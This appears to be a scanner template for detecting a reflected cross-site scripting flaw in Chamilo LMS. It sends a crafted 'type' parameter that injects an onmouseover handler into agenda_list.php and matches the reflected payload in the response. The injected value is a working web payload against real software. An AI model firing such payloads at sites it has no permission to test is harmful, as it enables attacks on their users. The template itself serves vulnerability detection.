id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting author: geeknik severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo requests: - method: GET path: - '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' - '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' matchers-condition: and matchers: - type: word part: body words: - "onmouseover%3dxss(0x01CE61)" - type: status status: - 200 - type: word part: header words: - "text/html"